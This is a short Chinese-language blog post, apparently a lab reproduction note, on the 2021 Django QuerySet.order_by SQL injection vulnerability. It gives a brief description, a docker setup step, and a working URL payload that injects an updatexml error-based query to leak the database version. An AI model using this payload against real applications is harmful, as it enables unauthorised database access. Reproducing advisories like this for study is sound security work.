漏洞描述

Django 于 2021年7月1日发布一个安全更新修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

 

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注